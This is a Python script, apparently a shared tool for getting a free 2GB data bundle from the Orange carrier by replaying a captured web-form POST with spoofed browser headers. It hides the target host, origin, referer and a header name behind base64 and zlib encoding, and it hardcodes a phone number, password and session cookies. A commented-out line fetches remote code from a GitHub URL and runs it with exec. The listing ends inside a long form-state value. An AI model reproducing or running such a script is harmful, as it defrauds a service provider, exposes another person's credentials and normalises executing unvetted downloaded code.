import requests , time , os , base64 , zlib

from base64 import b64decode as d1
from zlib import decompress as d2




#print(__file__)

#print(time.ctime(os.stat(__file__).st_ctime))
#open("/sdcard/.cs","w").write("0")



#downtime=(time.ctime(os.stat(__file__).st_ctime))
#if(not os.path.exists('/sdcard/.cs')):
#	open("/sdcard/.cs","w").write("0")



#def check():
#	if(os.path.exists("/sdcard/.ct")):
#		tm=open("/sdcard/.ct","r").read()
#		if(not downtime==tm):
#			open("/sdcard/.cs","w").write("0")
#			os.remove("/sdcard/.ct")
#			pass
#		else:
#			print("script has expired, downlaod again to use it.\nLink : https://exe.io/DFQ1c")
#			exit()




#check()



#reda=int(open("/sdcard/.cs","r").read())
#if(int(reda)>=3):
#	open("/sdcard/.ct","w").write(str(downtime))
#	print("script has expired, downlaod again to use it.\nLink : https://exe.io/DFQ1c")
#	exit()
########################























#colors#


black="\033[1;90m" # Black
red="\033[1;91m" # Red
green="\033[1;92m" # Green
yellow="\033[1;93m" # Yellow
blue="\033[1;94m" # Blue
purble="\033[1;95m" # Purple
cyan="\033[1;96m" # Cyan
white="\033[1;97m" # White






#######







logo=('''\033[1;32m:-.```..-.``+dddmdhyo/------------..-..` `.---/////:-` .:+//
..```...` -sdmmmms::/-...--------.....`````.//+ssooo+o/`.-::
``..-/+- .odmmmmdo/-.`...----:::::----...````.`.://+o++....-
..---` `.+hmmmdhyo:-...`.----:::::::---..--....-.`:/+/::.```
...```.:/ymNmhys+::--.-...---::::::-----....-..-:/+ssss/``..
o+++++oydmNmsoo/-:::--/:----::////://:-:.``..--.-::/osss+///
hyyyyysydmy++++:-/::.-//:---::::/++///+/::-.`..-..:/oosoooo+
ydmmmmmNNyo++/::://:..://:--:///:/+++/:::/::-..``..-//+oooo+
mmmmmmNNms+///-:::-:`.-://:-.:///////++/-.--::::---..-:/++++
dmmmmmNNdo//:--:.:.:...-:-:/:..--:////////::-...--......:+o+
ddmmmmmNh/::----.---.`.-.--.:::::--..-::--------.```````..:/
ddddmmmmm/--.....``..``.---.``--..-.---..```.......``.-:-.-/
shdddddmm:-...``.``..:..+/:-./ssso/:-yso+:.``.--.``...-:/+:/
ydddddddh/.``..`.``.-.----+o+-+yhhys://:/+/-.-.`..-+++++++++
dddddddmy--.`..........```.:sy+dh+-```.--/s:``-.`-:+ooo+++++
hddddddd//--.`.....://+//oo+odmNmhyoosyyohd:  `-./:+oo++++++
hhhhhddhoh::.`-.`...+yhdddhyydmNNNNmmmmNNNh-.` .-+++++++++++
hhhhhhhhsdy+-.`...-/ooydmddhhdmNNNNNNNNNNmys-``./++++++++++/
yyyyhhhhyyhhs-```/oyyhdddmdyydmmmNNNNNNNNmd: `.-/++++++/////
ssssyyyyyyyhhs:``:osyhhdddhsydmNmmNNNNNNmmo``/+///+/////////
osyyyyyyyyhhhy++-`+osyhhddhyooyshmNNNNNmms-::///////////////
sssssssssyhhhhsys/.ossyhhhhhyyymNNNNNNNms/////////////////::
ooosossssssyysyyyy+o+ossyssooososhhmmmms//////////////:/::::
+ooooooooossssyyyhhd//+ossssssyddmmmmhys/////:/:/:://:::::::
+++++++++ooossyhhdyyo/:/+syyhdmmNNmhhdms-//:::::::::::::::::
/////+++++ooosyhmd.:s///:/+oyhdddyydmmd+`:o/::/:::::::::::++
/////////+++oyhmmhy-//////:///+oydmmmmh+.:/s++so/::::::/++:.
//////////+oyhmmo+so://////++shmmmmmhdy+..://+/::------``  `
:///////+oshmNyo::/++:/+oo++oyhdmhhhmmho-`:/--/o+::.---..`.:
::////+osdNNds/::::///-/osooosssydmmmmho/..--. .+o+//---.-..''')
import sys,time
for r in logo:
	sys.stdout.write(r)
	sys.stdout.flush()
	time.sleep(0.0004)


print("\033[1;36m-"*50)
print("  \033[1;33mOrange 2GB SCRIPT --**--\n"+" "*20+"By Adham ALToP")
print(" \033[1;36m"*7+"-"*50)


print("\n\n"+"\033[1;34m="*40+"\n   \033[1;36mJoin Channels : \n"+" "*10+"https://t.me/Xtreme9000\n   "+" "*10+"https://t.me/CD3301 \n"+"\033[1;34m="*40+"\n")











####################


#pnum=str(input(green+"["+red+"?"+green+"]Enter your number : "+white))

#ppass=str(input(green+"["+red+"?"+green+"]Enter your pass : \033[1;97m"))

pnum="01200385889"
ppass="Adham3030@"



#cta='_ga=GA1.2.1634286606.1614429306; _gid=GA1.2.26725637.1614429306; _hjid=d499287f-a086-4d01-82c8-d4f515acaf8e; _CEFT=Q%3D%3D%3D; _fbp=fb.1.1614448434852.1759420322; WSS_FullScreenMode=false; _hjTLDTest=1; _hjAbsoluteSessionInProgress=1; ASP.NET_SessionId=uf0zq3libpgs1odeh0w5shn0; TS01b7f154=0109df9bcdc6d930fdbe9c1aa4e7bf3517989eb2b92f32734242a764811e2376269ecb4efd10e05da9c562cdfd551d6eb1af383a685244d5ff124cdb0d8510297c9ecd9e13; _gat_UA-102930922-16=1; Nop.customer=f8882dca-9b4d-4cf4-9527-698bd1ba41c0; TS01db6ab6=0109df9bcd6018c1038186fda90cdefce81ebbe5aa091adbb0bae60b9c546c4d5f3b02ce21960ee5e7d668daaca9f5e0666c161acf82b39d6f0f514e62ec62960f100543ed; TS015a72a4=0109df9bcd78008860cb1a19cf19bfdc4ac833a74c4420f06649166e2e2b1122a4aa88d7afcbf2fc503105e1f5f6466b3daf259125'



#exec(requests.get("https://raw.githubusercontent.com/adham9999/ogat/main/cta").text)

cta="Nop.customer=b7daad77-9409-4362-b07e-e1af4af3e0bc"




url=d1(d2(b'x\x9cK\xf4\x082H\xf6\xf05\xf3\xa9\xb44N1N.M2\xf6\xcaH\xcaM\xc9\xf1\xc9\r\xcb\xf31r\xab\xf4124\x8d\x0c\xf7\xcbJ2\x0e+Mq\xb6,N2J)HJ\xb7\xb5\x05\x00\x03X\x12D')).decode()




lhd={"Host": d1(d2(b'x\x9cK1N1\xf6\xc9\xb5\xac\x8c\x0c7\xcd\x8b\n6\xcd\x89*\xb7\xb5\x05\x00DJ\x06\x86')),
"Connection": "keep-alive",

"Content-Length": "13414",
"Cache-Control": "max-age=0",
"sec-ch-ua": '"Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"',
"sec-ch-ua-mobile": "?0",

"Upgrade-Insecure-Requests": "1",

"Origin": d1(d2(b'x\x9cK\xf4\x082H\xf6\xf05\xf3\xa9\xb44N1N.M2\xf6\xcaH\xcaM\xc9\xf1\xc9\r\xcb\x03\x00\x80m\t]')),
"Content-Type": "application/x-www-form-urlencoded",
"Save-Data": "on",

"User-Agent": d1(d2(b'x\x9c\r\xcb\xd1\x0e\x82 \x14\x00\xd0_Rs\xcd\x1eC(In=@"\xbe\x91\xb4\xdb\xd4\xb66\x909\xbe>\xdf\xcfQ\xfat\xb4z\xf3FV\xb9\x98\xce\xd8^p\x03\xe5Q]\x97\xd5\xf5\x88o\x8aE\x9fL\xd6JB\xc6\x86\xf8\xa1s\x8b\x99\xc3\xcf\xd5U\x0ei\\!\x19lY\xe0\x1d\xcbA\xd4\xc4[\x1d\x16\xcevS\x84\xb8\x1fj\x9b[|\xe9g|P\\\xa1.3H<\x13\x13+A\x12e\xf4\xf0\x19\xbfs\xbc+8\x88\t\x8a?\'J/G')),
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Sec-Fetch-Site": "same-origin",

"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-User": "?1",
"Sec-Fetch-Dest": "document",
"Referer": d1(d2(b'x\x9cK\xf4\x082H\xf6\xf05\xf3\xa9\xb44N1N.M2\xf6\xcaH\xcaM\xc9\xf1\xc9\r\xcb\xf31r\xab\xf4124\x8d\x0c\xf7\xcbJ2\x0e+Mq\xb6,N2J)H\xca\xb2\x0c\x8e\x8a\x082L\xce5\rK\xce-\xb7\xf4\n\xf1\xca\x8d\x8c\xf0\xcc\xf1\xcd\x8d\xb4\x05\x00 \xc4\x1at')),
"Accept-Encoding": "gzip, deflate, br",
"Accept-Language": "en-US,en;q=0.9,ar;q=0.8",
d1(d2(b'x\x9c\x0b4\xb2,K4\xca\xc9\x01\x00\n\xf0\x02\x9e')): cta}





data='_wpcmWpid=&wpcmVal=&MSOWebPartPage_PostbackSource=&MSOTlPn_SelectedWpId=&MSOTlPn_View=0&MSOTlPn_ShowSettings=False&MSOGallery_SelectedLibrary=&MSOGallery_FilterString=&MSOTlPn_Button=none&__EVENTTARGET=&__EVENTARGUMENT=&__REQUESTDIGEST=0xB513CC995A8FA0040AB2D4ED81CC5D5878933C2EA474A46E824877AB7E73FD1D91E8A4BBDB944789F71A6695C581BA6DAE2EFAD4B18A7E38D1B15939BA449639%2C27+Feb+2021+21%3A53%3A45+-0000&MSOSPWebPartManager_DisplayModeName=Browse&MSOSPWebPartManager_ExitingDesignMode=false&MSOWebPartPage_Shared=&MSOLayout_LayoutChanges=&MSOLayout_InDesignMode=&_wpSelected=&_wzSelected=&MSOSPWebPartManager_OldDisplayModeName=Browse&MSOSPWebPartManager_StartWebPartEditingName=false&MSOSPWebPartManager_EndWebPartEditing=false&__VIEWSTATE=7bQmVn0dyMSQf2HzZg%2FYhcahUpMrObYsl3CK4edwuefag1wANFbIDje4dYcYNptnkNgByErHPSQEnzQwZ5vAtKat7PNrRWgXcM1gdxZYuxD%2BH%2BI6OTQ%2BH22aXeCSBRA4K%2B5UzMtxd%2BhBeqA4js68WATJ%2Bl4tr56DSOkGJnDr3siPKzYZERM4HSfeVdMhM4b3vY4FlvBkc7UBjEO5hhhgWJ0Qxa78N4qGVajUDHuaEqHz7iwDw2pv%2Bo6kuW7L1sGz69ZKfmYthgWWNXlsUQKUOYwEQ%2B9%2FyEZ0qlO8guZ8bSMvPf5%2F8Embz%2BucHKX7flflweHmdKhHT%2FgHtWBLDza3EWh36wbOaYABci9QdEXpRp%2F9KUJhFQeeADMuJ%2BfuoVVzTzKXjmK0O9MM750YwWKoYV2oIyBkjypmWVZ6%2Bt%2F5cPv3wZnYufwgM7t%2FhmveAJrZRvMK7GIO8tpPmvI2AKwmNvb5iOOTGYCNxkN0Oih%2F1Qk2y2YdKDBr9uwhB28bki6q4dtw4apjEpcAPZvFgamn52CvJItSacgKQBPyZhJ%2FuwZ0FbPpsvNlC%2BhyiBws7s7%2FxQuj43jpHxiWkaLmwvAp2dRA3D%2B0IQ%2Bi7L8AWI9vuPZGmIJ5eq5ngAGZkxlkQsqL3U8Ct7ASl9CnA3g%2FP5wyvf7SOIMbD83EOGretyXzR1JvAbN5EgHJ7R3KANecziudB1Q1sbPhoEFlwVpYZF%2BEIst2lYtdTPaTMAMvfYvu%2Fv7XcmqlKINx6aL7Gw0ECjhk%2FgoisFnInQMQydTOBsPanHTOQw7629c8MA4HQ7jSUVctiiVCCCFZqivnUxuxeqtpHFj70IHqh45xGr5p2yQPjCZPOxxYIT07seEriPHzosNneEz%2BnULFetJGBS4Rrmu6gHevlqvlbrNbRzJx1St9ucoVpOQe1dZ5n6N0evJNYUnM8EWT58NHd3dIv%2BzCmN6N5xTesJmupCrIqLjRyJJL7r4RDii9kznL1VPKVjBEyfnVtK6dHkKB86H0%2FZGz15cd6Ct8AX6HV%2F1NGTNV6TkECokiXYSivju4LRU3EWmQxPF8racs1OZH0kq3HCXiearkUPI3b9Kvl2GTFsKyQHvjZ%2Fz8%2FHaur84kS4PxTbwg4QTgq2OWxuR4rTa%2B5YISkYARz03Vw7plzKrouuTRC1o9wrPQ60qeaBlQpUyoFuuTDU%2FdVucYLGKXNFnGpIqW5tNfyNxMwtlpNh8X0g1BLDSmh1AX07xPat3xOdBd%2BT3HFwoVtiiasPW9nQifN5S9%2BgWdsxa1Fr1adKbWJxSCmBDP9yIAWtfjPcxT%2F0XXGfPcY2jBW20pG2YWIpQx0x0xPYeFDjebdmTyvJa9DfuX0JeBae5Onop97Ci9AHToYrFtW1jO77lliHgfe1uFhuAGV1W4%2B4nHYmDym88z%2FmNrhwT33dle5DxUss85bbN2Yc6f8eKzMYeuHbEXfPQW%2FL6ByYFpKbMtHM7Vu%2BS6NZUbPRwCmKeen%2FFDCCHE9PMR4wXB2MFb9UhTLGRoVCn%2BSDw4T1hN%2F3FbhREjPsELocsjnWwl3BLaX4mOnlE1oh72AKFEjLgCl2orxd0CwIc5WvVP%2BuQIOdq9ifFW%2F8mKrmXfBX%2BfsCmqixCmgriHvMpZHaOFA2QyRhNsffoHwyWnnWXrPPSyrNe4WRSUHyIWcFCs3CvTgEWMuKsMwImB11GRWouHv04Kf4yrJrTm1xWqh8%2BmwKPeCmlimq3UoGUdKne%2Fps5g9zmWfvhfPOT17mjkxpz4anng2HMIzs6dI9Ro3PgQRhiFJRoAXQMRah1OzAGXuqwlf1nt48qjOELjVs0HlSzMMOQhquxaJ19yKoJCgE%2BhIn%2BO6ym5WebmbO6%2F9l%2FQLzYbsppd44Y4WM9NdTr0VydwFRS5xrp3CVbTxTfYCRs7o6rghDlfOYlavnFH4NVkmUVmLYsaeXYhJzIY8YI05PfxMGrpjJeFEbT2jSjtLfJ%2B6Kjj6SVFtOT7HlWyJAm7pJPvc5pIyrx%2FCMxDVrox8oew5Ry2cGWwEUWVrekJ0r9H%2BhJCZmMmrt6Q3MTJCbNzztlUvH54a4ADvfz1QFmdRn9MwDbYS7zTr3OjL4Uh%2Baod4PdX7eMtcooqO9fdPZuOTdon7NBUBjziKaFKTD3R8Yac%2BaRhxWY9I4gwB5Wm9M%2FUPMnvfW9EtOI7ij1kw3dMCICN3hiG3pXe1YSd2SPGIzxRX4olUviEAbTY5M%2FRu8UxX4w7wNmtXvlz2PZPD7p%2F3vbdJqDkdIs6gYufi%2FOI6iK9oapT1tBhEPByaq27vol0vWtmmiSCdM5PKoeABcJTO6DKZBZgzwmIGm7TsSl%2BVSqyDaK%2BvuNwZoIxsGGBau9RCnYk4n1voHMjcsdrnBT53nFH1%2Fpe4yVYk7bPbMZY7ysqoqDEzIu9DkNQ8rG7bBVXkFIPZMQ1xXxdNCCfkgJMIUHEQ3z0U%2FfahqJqNbu5acrGRTIJlA0Z3UAonXl3UbyB7qEYlZYQ7tbut7mBdiu9igNs2XeUMqcPxek9zcYVm0QtPgMs2cdUM94XYcWQwTJTfURjsR7U3NuScVxpncIujEXa02mIJYHEtYhncI1FHSZhr%2BvMwleFV8Kk8iPMqMSrSNFPEDEl5RDblKMd0EDqDSSehT0FSiTMiJZ7sBMLg6WNPNEEUR9Z%2BlyxRezVRK5s%2FgmAUS9KCVgiV2E38kls3qFsffKCSCMGsK3nVar%2BUP1PUpJ0eFGlGK68iLzkyjQGQediX3KZiy0y5LD2GFNo634J%2BShn%2FMVcBBlPruPOfgN4XqzfdN%2FIwjCV5dLTMDDvjcWi%2Bu%2BVMR2HBboWgn8G4ZekD3ysYPBMECdL%2BJnfubS61a5WQUNHwLbQKgrLvU9bxfBhPLX8dguqtEJs%2BSb6Sx9o9YH6vVDVVvhchZm8o0vVqP841emq9kgxVcbw%2FPrQynuDt13oBGTwOYzvwO5eQ1UPs9xgijv5ynwY0oLAy36ABIZdfPLxlf7rfUkAu3T0zJeax%2BbcV%2FaVkAqcGTOoTFOCiAvY53xIsFm4xbThFiB47NyG1lpZfKzOh9LHIuU9p%2BjuejETY8XMNFn7kCY48Fil8UwKVIKGOJoeL4MvspoQqIODYujCAyBPpq7syl4VlSWZkKBuWB%2B66JVqAdq6EKdSMkTM04FNEV22KB%2FeSD12tiP3xiiBSuLf2BvM4XN2E0DJodPNtuAjRHlTByc1LlOnhDDqd%2BSLPf8098m06lY%2BFqgqJ27%2F01WJuxTWLK1P1sJwWQfclj5yuEA9lkO0O4zXnyp29eQ7FZgFMWtZizHMghWVAbsJuwGxn5HDQ0FBPvgB7OPrGe855bdKrPSH0G2s%2BXzuOoj008L%2B64%2Fd7XR3HBvQ8kY7dQ%2FEVa1V3dO7o2yFTGN6F0tKARLjApSfmr7rmFFyFDl88RJAEQHIPJklbcuCdFHdOCvNd01tkqIM4HZEgG6DLI%2BtAnNGm6WmvXpgUeBEfnQg%2BJ4Wz7lE3D6Plc%2FEOfY2o17nLsZG3RBI4J6mIm4IsyneYn3EM3ACl3Z8tKbvMUh7hgRRRhO22EolDw%2FLO%2BexPR2Q3NBt0vBmuRFLgXa%2Fa9ct2WNve5a4%2FzhJnunUA0WILde0mprp0yU05YZtxCQQ1PTH%2BCDX%2BbBc2R0oVR9V0MiKN9KxPOtDzGtaB0%2FYadjbXoolBTa7BKSsvhTTHmOgARBFcutT%2F%2Bu8OOFgoLAmEjl1TTbgmfu6l4k3vi0FJ0Ar2WA1rDF2d1%2BgFweYxEUTmhQrBYRkK%2Bq6dmqlLNmN0kxD0eh7WLiWmQU1Fex7j2YTikmxV3v92o49yU%2FQ7ff47viqEUC9%2FhPiQ4wHax8rO%2FzFJVusbrD7HNtB1ViUFNg0SSg11C%2Bgim7oeTtRJYB4V1tCUfJm1IjbbCCGqIosBE8q12BnfXYG54JVSNElrfvmbg%2BOjD9gRgw%2FoDg3gNSVPUwtEZRf6lUWMEOtbZiIkyLqDl6fzqnxn7Ety8BfYVuEOogzdBVGTqHYLVz5kv52wvEYCQ7ADW0Kz4vJ8SKvTwDOb2Ve9MN6c8YjWF8mStixfswmD8XIT2XX6zsGuAue3abfaXfh1BAB%2F2u8J6ytaEhdNKse85dGBb4f8szVk3KcbEim24Xzqf9tWfjdrgjqjby9nRzrA80wPxJ1qJmtzXfqKKN4%2B5hZJhFzq789fdsR8jO46OtgDfGSpk3cC5WRKnP%2BdtC9kKwhiQ8%2FEZs7DBwahUQshZGHe6XeV2TRRNxSgDcof0n14bZanusrNku7v9tGXebpLfnkVCShTod7VC%2Fmt6kyqO1DiHgp58zB7yMrD4FR6vsd6yriUuwesH3tAlxVwJ3m7Oay%2FUvVpkHLnN7Q2Oz67x68OjtmZSe5rXJcGyS8N9BLcllzVAacgH1Vx%2F0AYwf33ttc2dMld23ZM1bp5vQ4gYHXU%2FhT9tLfQ05BaSYaChRWwAzv0vthznu5MJh7codk3iMGLeqOUek8bjY06bDu9Hvy%2Fpu6g24JLWyWQ9y8FF6QO6S1as%2Bxv4muuMS0Hs6VK3OZFJW4nhdYa%2F8UH5SihBzKpaJvIKJF8MWnOCNJxpGXSMOC74SDXImxJgXxxYlZj2cQw5a5o9OMuVsRi%2Fig1%2FSOa2vilC3AYQcuFvWA61oAMlp13RZ97SIL22JDvugLY6HtZn4QAyIfkbwM7I0l6SrEOdylJPnU6Gntt5NJTOe5mEGVpCflztWAFOfjGV%2FCRPxIhVO1PiLDct4p0%2BkZlPypvzHwk%2B7gZcQejPk5KlPockRe6ypYsuo3zqYEtC8D7BW8xV3Yay5DRtcAa5eQctVQjYBwt1BFje65VootOjJDuCUDArLVZ6WFj0hPLap7u6K1Q7wtO2S8WU4snfBCzYG0PBwQ0WLpi6mWiAf1QUpNsQ5G4BaVjxnjns60dzU5x49LNytJ75k5HRtg%2BjS3PbIaeVr%2B6WfrEET6MVrNPl8NTZSgdRw5Eg5hiGmJIHihiahxwQCg8iCUzinnb9rHIcpb8wN1xTMi1j71fBnnDXi%2FA6Uos4n91cpKbOPLYlze9wrOvAft8a1uS1x0DT%2B5eVutFmiFth5llvw7gUtbR1NHxkAt53QdVYZl7hrLCRW1gtgtoaeTd63epU3AryARVLgJ3xdZlemG8CZFTnNIkfvDsLJfreebrHJ6s%2FVYVozU43fgGiRqsvaUA4f8NlkYuVYJeQDEFRWk3RbM%2Fjukg1bLkK7B0o2AGZ12O9mv0vflq2yy%2B3DjxXaDJL2LVhbm8ECNxcnNyyT7TDfSCTlJW8bOhNiE9HgpQICxVlFLuWEQuA6rly8VZ2GgF21VWo%2BJpmSUygtNYSsbX%2FCQ2QqotEHm5WLf8vg2ZkSglwxNiPp8flaGzumHGBYDNMkOrD5QKKeoaPd4MnLvkQxx4qwRmOZ7v5AKEmmQ3Fm4Uv%2B%2BimTxsqZEzrt1L3JYkRGRsOLS844jjHySvKO6PbarldcHkzrgbmn%2FF%2FJRDCK6ZLv3MzSlGhyqoqjvFCKW77XhTvy5pupHGIE0G169UDdc1VdkVQnLSsY86D46iX%2FG0KphP%2B0tdtdZCtgF%2BQfGFZRFVn3inVpWDjCDQihORP4jxBNSz%2Fm%2F4gXAI%2FtW2NlApsYbQB%2BKQEm3YmlhnwAuAVyeJPhnbQ9AnDiNqAMUDxxMRdEVhTAKuT%2BUf76OQjw%2FdupV5b5IHrowEcuROwgwFgEK2UfDuzrW%2F4Udk%2Fqcilm7M6QHx130gOWnPM%2FFCldFDB62KNwF%2FWOXLUWr9X1ZdgAGphJI5Rl0nU3RZbqfHoRPU8ZZlsTXFVsBley5UX6bU5WA5PiFBo0y%2BuxQoy8WlD9HqfPXDVeacFTG9%2FM9furS5KSQGNWXzFiUKiuhZwspRxEO6LBYq3FvCh3DrtU5glemahaij8HArN9igTDiZWBZ39%2FwqCAGyfmWuUhoTw86V%2FzctF6tBGPtjWlywkC9v7FTbBaggjKq4bsot5UQAZy0Lc1iZd2sx4ftBGe30AIRGMf2bI1W6JQxRh%2B6cOBMO5NhxjOvrvYO38nlPgRcrOuicWuvaVN5lbEeqZRGaf2tKUkj5TNiueJAP7W3IezVpKxdKjQSybBTRVoDSsgA8d7SlndHcEyxvvpWvXJv4zQNvaz1y1wS%2F3HdAGXK8boI0h4JROxqwqe0%2FouK%2FR9nAhyi8IPooZL1f2jBhuAA4%2FlYyE1qL4YBRBNx0AkoeWOxpNrER9gA4jk4d9zKc1qTg1lns8eytRNRQbcH8Bo%2Bki9g0Z09tUrWwWFHxIY3duw%2B07TWW%2Bw4RvdCLf2vR2%2ForSAvuavFdu0lgsVOGTfDLxzh0B7mZZ9Q2HSv77kbUQiTT3Ne32sm3j2SSu190mukJ7d2lHMmGAaOYfqUHwdtDcuKpSR6aEYv4Eexb1kOI1PUXxK7utLHkKPfHwq1j6DR6gbPuF81317zz0PG5k7J53vu6JNyxt5738QrZj7dCnyeJKpXNmPUG3nmaZfHIxlNthr%2FydtLA14ij8YZlcEV3C4mP2BDBvLzYEqknudTvU70%2BUKa84HcmJ6YVoFQLqJzDtAaYN4IsTumpuvCoEne7xmt8F11ofxv3rKdJYgi0KtshYrM9X2uDsmJauU4p5Fspa6945fVFOKomNMVBzUVFG2OBSOBAd4ydbhwZZQIFBrdCMCU72hj9j8kQvtIM4Cjp2T4KhUu1%2F4FOnbUQcQ%2Fb7Xt9BSMS5juyQUIuYiNnCRzrBQCrC1524GKg4nffaCr22b29sK1J%2BHNLC7P%2BdtxcVvDySdx95wCAab9V2JlNqU2MAxO6ObY%2F4XK9d3qwdHJZPb6HZnLWEwj0adswnbJJw9ApgsfkxAeHD6be5ZFJR2mBT2PsgWQeecrX33IBaqZmSXUuyH2UE2bk0AcCgG8k%2BSGAcPCzLr%2BKcilxN8720LM%2BbFBN6xhxrbjskhejyoESG4luNIK9H7s%2FiuvOiKpjQbIjuBs1Fb0Gi5%2B98zdqhzv%2FmCyVT9GNT6OYNnpp9JKeTY40KJfCoXUIXf8ZzU9fWzOOzW5kF%2BBndrqK8x4nz%2FdepK%2B6ptEVA5yMTdjSczcZodyZ6C9hAPDUHrtMG2b0GEVv3Dcv%2FaAyV8dLBJExuMQe4foeg0O1li2eScUZieuVcE39xsl5awoKWHbK0WMSwdrkjRxQM7JNnFo9C2h1wEByccBDO7uXPohaaIFoV1oj6xgPyYnn3KZAonqw5C2ztFHcDsuqg%2BkOKz4heA%2BcyNGaDrtQNODAiRITOb7cITowqHtZYpbcZi2Hfdx5fqAQZqdkYG5kMagHhXVmuIW1p3IssvKglecRVXWstwisdUtfe3it%2Bv9XkwGjL39yb3ZRrGWiGDnXrwFZgkHZOgfK0fxxZ50dNzeHJGsdkV92rAlNsV4JM6VDG5Z2ZOtcb064vecr5Ukfw4UKyHi2LdEaTE3StR4%2FgfXN%2Fg%2FD6XIw0AI1EbzvEzWEkPiiNMsCVzGwIOIwgzilhBMnwrM8xmAj6CwnW%2FTnkgnwrd6KFKEzrEaoP%2BK2vfdFIMojM%2F43b21ENaT%2B8S4cu6qwmSjabGfGTQFkqRkuUgGpxGsgvvncae4ND6eb6%2FPktf50GmEPSe6k3MV5hJocFFHTSl%2FKv4yP1LpF0GpTdFZ7YlAqJyhvLfX7YHX8GnkRJy%2FXVlXBJLO7UwMvPM%2FzF1qWEpS92uHSQnfb8nDPTqX6sEuEWr4Fy2NBgWr3%2FOAPeaSnUQz5Yu%2FDuveDMrrK5hyNkfRmo%2BIUbM6dOLI96s0%2Fw6UYLn31Xuc7G8124Hfp1%2BLYD6J9jIk36rYE3RI8vcM6VsE8z2pYyUiBV8LWh1r2Mj48QIJ6e57k4oq7vD5yyn4dym5sbwZRQvA5WAh19PlrDj8TGSsxN8WVqahukF1Wt0vNOsPXbZFHOLMdTuUZljGjwsP9InLh0rou%2FLy7EAIOqwBbq25tr7MKas2xTWOROL99FUnlRX1lD6WxkEAqolUfpSJX5Uu9fg%2Beap7CbO7E5D7CW1h9qHX63A2o6kHN8Wh3UyAKCnMn9hpGgpcSjcwduLKjhA8f0gpBxaq40CQtuG5C1Dxh89FJFIGG96k4nWtFL2OQIFgXjjfmEaqBhaxyCMNUDqUF7PEvf5I2xld58KPwkaFU6LObMzL9rgK113SyxJcOhjQEm60EgdiqcOIE6PjGFrAi0Q630BWK3QHHN3AG30kky6xRJQ90ozJE6KhbZqKe8CylyfMG%2BhYyWASYe3HZyCRlAun21B2iunghoAilyEt8PHkgi4HDuFh%2FOWOAqg1eQEpWqMEoflt%2B0MNwEsD7zScjrT5MSgynpfX2SCj2SCU2HKp%2BiyW%2Ff9Fiq%2BZ6fqHqvwExGBp%2FAKWIE%2FdQHKbkgUavvdXVVqHyJOL1JDGo5h0m9By805LpgjaoTEATGsExzQD2A9uVs88BdZ%2BzkuRztmaBfUL3kKo6Qb3ha9HCx3VHETDMA3S5gL%2B7XMN1PNUau52Ez2KTrnqyagrXqUW166tuxO6Z%2FMD0IWKC790WQo%2Bprxp6iLGJyzqgltOtRoaD6Gq3StgZgXiK180QHVF0NDE9nBnfx6JpN1b%2FGheukrCw1ruAGCHfkMl33tbgSD6Is8n05Wk1K4jmXBLR4ddQqL7IMIWJBOZjr%2FaE1eyZcdbPPUgVFOom%2BrnygY9dUo7LG8G7nK2sGBLFbhEz9vZvxLXjuTCHFw2h6%2FEQTsMmzPfeF5ok6eGTO%2FeLCaCJChMOm7x79rFMMOI1gq37K5zF%2BIChC%2BbEbR1t9vaQnUu9XTL7aeCKWsalAnChvcpmoHdkIyMpMFawV%2FcIDOpM8M%2Bu8YkX7jBGMdJpB0JV8tkTwS4QgZ2h8QZD3SP%2FgriLSHWh%2Fb8OvAVOGglIBYUmGbZB1EYza5ttJFvPMpbsM0j%2BlYR38n5eoqaAoSD4jNRQkckZXBdSQbr4Bfc52ASJGIRaOpP3QKqCgKlma9jF%2BEILYkEvNSkvn9AAlmzgdtU%2B6RkTem55dy8dME0f%2BRAePz9ApUgfmzc4j7SeUK3KcFK9aB2qRm6hyp0%2B1AZTOMvQuJ3yA7nMNZ9Km3lUuc0niFvr8VjC3VqW2eNQOfWDQc4%2FSW0RkNsM%2B5M3tiTkQmUR%2F8HLsPKeHmpFSp0MoQy19ddwaL69cbSUlo7q%2FFuPPLBNwFkGzhhXrluztyJUbS5TGGE%2FPX7WunHagw4XMB%2BakunO5VlltPIL%2Bq%2BWk6KjTdRou28ZDhbiqI3g1VjyeANkzxx3cGlqPylX1rReADQUHkUMLRPg32kXBPSUMDuFxFUtBYU3brTmFJGWQeeRu%2BUehql15KGXgySuu4PjqAE6og8V24l0Fs89yZHCuXLcbclfjhIk3LbVmfIWxPR%2FwpmtbftcCbs%2BKVV%2FQRBR4aWJQSSt1GVAXKtB2JR9a9%2BgENe3%2FA9pmmigYU77GuyVbzK7%2B7aIPJprUK5ErObDL87A3uJ8CzOiPjZ1b5K4YYfVy1graVZkE7b7dBrYZghdYiAkrLHItyNbA50lPVr7bSODuLdeJqBGbjOPz%2FK0tBQSuXsBDEjYBtU3fLVK4LTu%2BGhd0%2BSTNCYpjWobBLjTMyO0bISjYe9tsvpkMwmzpd7ad0v1GW8LH6hPWoSHD90E7zuFsLAavQdWN1%2Bqwhb62njREco5ZJ7sX9%2B9p0%2FFCQbl0W%2F1wm3zD9rs50VmsLxX8Zu5eHTRlVcovVFHPwrM%2BIYnuRSJQXEzxQ3sT5HhID4bfbr9xAhuKkPTsOW%2BEkmUtXhBuPnXIuR%2F7FbsyIQJHSBVXKUQUQbQIsHikcNUq3K9GB2MIiEqhGT5IqKn7IR%2FbY3td7JdQnK8%2BAt%2FQ7z7LP01%2FJQxjG23t3sApwKxWBDgAjJkm5PIEaiMg9X%2B5VtORTojmAwGsZ69WVZRBvlt6XPYo%2BBYYpyXa94sOaNtsb2BpBZYR818rC7q%2BeQYbIa31f96u7iIMXdnelQiV2MFgJntGVKSVwWx08YHNKvsRdm2qaBZXsFWSmRC32HI12MVjRBpT%2BL1vUkA0vnIqH9vwwkaI39GhNmlEEv5ujhKiQ8gPZDmwBXSBJM9M7XRa4KJWHPCli7MvaZpkydKABOyIY9OPalylK%2B0ITUz9Iuk0RfFanVJiluNQwRACc0Nx5O1hq1Ar852wu4Wgoz2ajfKhR0%2Bju1rGoUbUe4mXigNt0LHpOImCfHUn34TjwE6YKu1%2BVEfcMgqZGyQYIF779Q%2FdKuYnKiDfH67dyP0ImMztNpIeIYubUdPoBtIuv8UdwApoYIhos9yhmmL%2BWOYuKKZNyP3DA2cfoxtAQJJN22uPjRjQ7Rr7HtfAQWBCcKkMJgth%2FAgsip1HTklYXNVhGHS57Lr6A0x5pAuSjN1C%2FlFl6wn1ON6i6TzIlMmE49bD2UVIuPmpGpz